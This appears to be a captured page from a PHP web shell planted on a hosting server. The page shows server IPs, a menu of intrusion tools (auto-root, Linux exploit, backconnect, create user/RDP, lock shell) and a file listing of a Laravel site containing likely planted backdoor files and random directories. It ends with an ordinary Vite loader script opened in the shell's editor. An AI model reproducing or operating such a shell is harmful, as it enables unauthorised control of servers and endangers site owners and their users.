Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.252
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo7.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
Cms
[ DIR ]
drwxrwxr-x
Modules
[ DIR ]
drwxrwxr-x
__MACOSX
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxrwxr-x
bootstrap
[ DIR ]
drwxrwxr-x
cjlqids
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxrwxr-x
database
[ DIR ]
drwxrwxr-x
fwcpgnv
[ DIR ]
drwxr-xr-x
grxqdsy
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxrwxr-x
lpihryn
[ DIR ]
drwxr-xr-x
lzjm1uo
[ DIR ]
drwxr-xr-x
m1ikorj
[ DIR ]
drwxr-xr-x
psn1afk
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxrwxr-x
resources
[ DIR ]
drwxrwxr-x
routes
[ DIR ]
drwxrwxr-x
sql
[ DIR ]
drwxrwxr-x
storage
[ DIR ]
drwxrwxr-x
stubs
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
tourex-prev
[ DIR ]
drwxrwxr-x
vendor
[ DIR ]
drwxrwxr-x
vfmjetq
[ DIR ]
drwxr-xr-x
.editorconfig
258
B
-rw-rw-r--
.env
1.32
KB
-rw-rw-r--
.env.example
1.06
KB
-rw-rw-r--
.gitattributes
269
B
-rw-rw-r--
.gitignore
326
B
-rw-rw-r--
.htaccess
479
B
-rw-r--r--
README.md
4.06
KB
-rw-rw-r--
artisan
1.65
KB
-rw-rw-r--
composer.json
2.42
KB
-rw-rw-r--
composer.lock
342.46
KB
-rw-rw-r--
error_log
370
B
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
index.php
1.18
KB
-rw-r--r--
jbrpkjmr.php
167.15
KB
-rw-r--r--
license-jkdh.php
629
B
-rw-r--r--
modules_statuses.json
580
B
-rw-rw-r--
package.json
387
B
-rw-rw-r--
phpunit.xml
1.12
KB
-rw-rw-r--
remix.mdc
1.02
KB
-rw-rw-r--
robots.txt
85
B
-rw-r--r--
server.php
563
B
-rw-rw-r--
vite-module-loader.js
1.36
KB
-rw-rw-r--
vite.config.js
646
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vite-module-loader.js
import fs from 'fs/promises'; import path from 'path'; async function collectModuleAssetsPaths(paths, modulesPath) { modulesPath = path.join(__dirname, modulesPath); const moduleStatusesPath = path.join(__dirname, 'modules_statuses.json'); try { // Read module_statuses.json const moduleStatusesContent = await fs.readFile(moduleStatusesPath, 'utf-8'); const moduleStatuses = JSON.parse(moduleStatusesContent); // Read module directories const moduleDirectories = await fs.readdir(modulesPath); for (const moduleDir of moduleDirectories) { if (moduleDir === '.DS_Store') { // Skip .DS_Store directory continue; } // Check if the module is enabled (status is true) if (moduleStatuses[moduleDir] === true) { const viteConfigPath = path.join(modulesPath, moduleDir, 'vite.config.js'); const stat = await fs.stat(viteConfigPath); if (stat.isFile()) { // Import the module-specific Vite configuration const moduleConfig = await import(viteConfigPath); if (moduleConfig.paths && Array.isArray(moduleConfig.paths)) { paths.push(...moduleConfig.paths); } } } } } catch (error) { console.error(`Error reading module statuses or module configurations: ${error}`); } return paths; } export default collectModuleAssetsPaths;
Close